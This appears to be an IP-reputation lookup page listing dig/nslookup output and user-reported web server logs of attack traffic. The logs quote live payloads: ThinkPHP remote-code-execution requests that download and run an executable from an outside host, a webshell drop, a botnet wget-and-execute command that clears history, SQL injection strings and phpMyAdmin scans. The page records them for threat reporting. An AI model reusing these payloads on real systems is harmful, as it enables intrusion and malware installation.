城市(city): unknown
省份(region): unknown
国家(country): Thailand
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 1.10.172.31
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 32056
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;1.10.172.31. IN A
;; AUTHORITY SECTION:
. 389 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022022302 1800 900 604800 86400
;; Query time: 17 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Feb 24 10:27:44 CST 2022
;; MSG SIZE rcvd: 10431.172.10.1.in-addr.arpa domain name pointer node-8pr.pool-1-10.dynamic.totinternet.net.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
31.172.10.1.in-addr.arpa name = node-8pr.pool-1-10.dynamic.totinternet.net.
Authoritative answers can be found from:| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 118.25.49.95 | attack | 118.25.49.95 - - [10/Apr/2019:06:35:38 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%2
0(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.
1" 404 232 "http://118.25.52.138:80/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Ne
t.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9
.0; Windows NT 6.1)"
118.25.49.95 - - [10/Apr/2019:06:35:38 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 301 194 "http://118.25.52.138:80/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars
[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [10/Apr/2019:06:35:38 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 404 232 "http://118.25.52.138:80/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars
[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-10 07:14:51 |
| 193.112.0.62 | attack | 193.112.0.62 - - [02/Apr/2019:22:58:24 +0800] "GET /rockmongo/ HTTP/1.1" 404 209 "http://118.25.52.138:80/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36" 193.112.0.62 - - [02/Apr/2019:22:58:24 +0800] "GET /server-status HTTP/1.1" 301 194 "http://118.25.52.138:80/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36" 193.112.0.62 - - [02/Apr/2019:22:58:24 +0800] "GET /server-status HTTP/1.1" 404 209 "http://118.25.52.138:80/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36" 193.112.0.62 - - [02/Apr/2019:22:58:24 +0800] "GET /ueditor.all.js HTTP/1.1" 301 194 "http://118.25.52.138:80/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36" 193.112.0.62 - - [02/Apr/2019:22:58:24 +0800] "GET /ueditor.all.js HTTP/1.1" 404 209 "http://118.25.52.138:80/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36" |
2019-04-03 06:21:28 |
| 61.174.53.3 | attack | 61.174.53.3 - - [04/Apr/2019:14:03:05 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 301 194 "-" "ZmEu" 61.174.53.3 - - [04/Apr/2019:14:03:05 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "ZmEu" |
2019-04-04 14:07:14 |
| 118.25.49.95 | attack | 118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=index/think\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php HTTP/1.1" 400 682 "http://118.25.52.138:443/public/index.php?s=/index/\\x5Cthink\\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.49.95 - - [02/Apr/2019:20:00:02 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start%20C:/Windows/temp/lodhbrsdjsbwixa27329.exe HTTP/1.1" 400 682 "http://118.25.52.138:443/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/lodhbrsdjsbwixa27329.exe');start C:/Windows/temp/lodhbrsdjsbwixa27329.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-02 20:03:22 |
| 14.17.3.64 | attack | 14.17.3.64 - - [10/Apr/2019:19:11:05 +0800] "GET //robots1.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobi le/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [10/Apr/2019:19:11:06 +0800] "GET //robots1.php HTTP/1.1" 308 257 "http://ipinfo.asytech.cn//robots1.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebK it/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [10/Apr/2019:19:11:06 +0800] "GET / HTTP/1.1" 301 194 "https://ipinfo.asytech.cn//robots1.php" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" 14.17.3.64 - - [10/Apr/2019:19:11:06 +0800] "GET / HTTP/1.1" 200 3275 "http://ipinfo.asytech.cn/" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, lik e Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Core/UIWebView NetType/2G Mem/117" |
2019-04-10 19:52:51 |
| 121.84.221.236 | attack | 121.84.221.236 - - [08/Apr/2019:19:53:14 +0800] "GET /index.php?s=/index/\\x09hink\\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.244.25.131/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' HTTP/1.1" 400 182 "-" "Akari(selfrep)" |
2019-04-08 19:54:18 |
| 185.53.91.24 | bots | 185.53.91.24 - - [06/Apr/2019:07:13:10 +0800] "GET /admin/assets/js/views/login.js HTTP/1.1" 404 209 "-" "python-requests/2.21.0" 185.53.91.24 - - [06/Apr/2019:07:13:12 +0800] "GET /admin/assets/js/views/login.js HTTP/1.1" 301 194 "-" "python-requests/2.21.0" 185.53.91.24 - - [06/Apr/2019:07:13:14 +0800] "GET /admin/assets/js/views/login.js HTTP/1.1" 404 209 "-" "python-requests/2.21.0" |
2019-04-06 07:34:25 |
| 139.59.26.155 | attack | 139.59.26.155 - - [07/Apr/2019:22:50:18 +0800] "GET /phpMyAdmin/ HTTP/1.1" 301 194 "-" "ZmEu" 139.59.26.155 - - [07/Apr/2019:22:50:18 +0800] "GET /phpmyadmin/ HTTP/1.1" 301 194 "-" "ZmEu" |
2019-04-08 04:57:56 |
| 186.82.70.55 | attack | sql注入攻击 186.82.70.55 - - [10/Apr/2019:06:30:16 +0800] "GET /check-ip/14.34.148.34/%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(107,110,113,83,79,106,98,102,109,100,116,99),1),name_const (CHAR(107,110,113,83,79,106,98,102,109,100,116,99),1))a)%20--%20%27x%27=%27x HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" 186.82.70.55 - - [10/Apr/2019:06:30:19 +0800] "GET /iplist/2%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,104,114,106,112,73,65,102,81,80,111),1),name_const(CHAR(85,104,114,106,1 12,73,65,102,81,80,111),1))a)%20--%20and%201%3D1 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" 186.82.70.55 - - [10/Apr/2019:06:30:19 +0800] "GET /%20or%20(1,2)=(select*from(select%20name_const(CHAR(85,111,78,69,104,81,99,85,73),1),name_const(CHAR(85,111,78,69,104,81,99,85,73),1))a )%20--%20and%201%3D1 HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" |
2019-04-10 07:14:16 |
| 23.100.232.233 | bots | 应该是微软爬虫,不是真实流量 23.100.232.233 - - [02/Apr/2019:12:54:13 +0800] "GET /index.php/2018/12/05/didi_2018_12_05_cn/ HTTP/1.1" 200 13104 "http://www.bing.com/search?q=https%3A%2F%2Fz.didi.cn%2FroB7WDCz5iTXn&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" 23.100.232.233 - - [02/Apr/2019:12:54:14 +0800] "GET /wp-content/themes/twentyfifteen/js/html5.js HTTP/1.1" 200 1695 "https://www.eznewstoday.com/index.php/2018/12/05/didi_2018_12_05_cn/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)" |
2019-04-02 13:02:17 |
| 161.69.99.11 | bots | 161.69.99.11 - - [06/Apr/2019:04:44:10 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0" 161.69.99.11 - - [06/Apr/2019:04:44:11 +0800] "GET / HTTP/1.1" 200 3261 "http://118.25.52.138" "Go-http-client/1.1" |
2019-04-06 04:47:39 |
| 117.41.229.28 | attack | 117.41.229.28 - - [08/Apr/2019:23:19:09 +0800] "POST /wuwu11.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 117.41.229.28 - - [08/Apr/2019:23:19:09 +0800] "POST /xw.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 117.41.229.28 - - [08/Apr/2019:23:19:09 +0800] "POST /xw1.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 117.41.229.28 - - [08/Apr/2019:23:19:09 +0800] "POST /9678.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 117.41.229.28 - - [08/Apr/2019:23:19:09 +0800] "POST /wc.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 117.41.229.28 - - [08/Apr/2019:23:19:09 +0800] "POST /xx.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 117.41.229.28 - - [08/Apr/2019:23:19:09 +0800] "POST /s.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 117.41.229.28 - - [08/Apr/2019:23:19:09 +0800] "POST /w.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 117.41.229.28 - - [08/Apr/2019:23:19:09 +0800] "POST /sheep.php HTTP/1.1" 301 194 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" |
2019-04-09 04:07:02 |
| 122.114.158.230 | attack | 122.114.158.230 - - [04/Apr/2019:09:15:21 +0800] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 101457 "http://eznewstoday.com//index.php?m=member&c=index&a=register&siteid=1" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" |
2019-04-04 09:16:20 |
| 46.119.126.51 | spam | 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://jav-fetish.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://gidonline.one/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://gidonline.one/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:49 +0800] "GET / HTTP/1.1" 301 228 "https://jav-fetish.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:50 +0800] "GET / HTTP/1.1" 301 228 "https://gidonline.one/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 46.119.126.51 - - [03/Apr/2019:16:36:50 +0800] "GET / HTTP/1.1" 301 228 "https://jav-fetish.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" |
2019-04-03 16:42:55 |
| 207.46.13.239 | bots | 微软爬虫 207.46.13.239 - - [08/Apr/2019:08:24:31 +0800] "GET /check-ip/140.143.208.180 HTTP/1.1" 200 8658 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 207.46.13.239 - - [08/Apr/2019:08:24:31 +0800] "GET /check-ip/46.176.7.175 HTTP/1.1" 200 7632 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 207.46.13.239 - - [08/Apr/2019:08:24:31 +0800] "GET /check-ip/69.12.66.213 HTTP/1.1" 200 7890 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" |
2019-04-08 08:28:58 |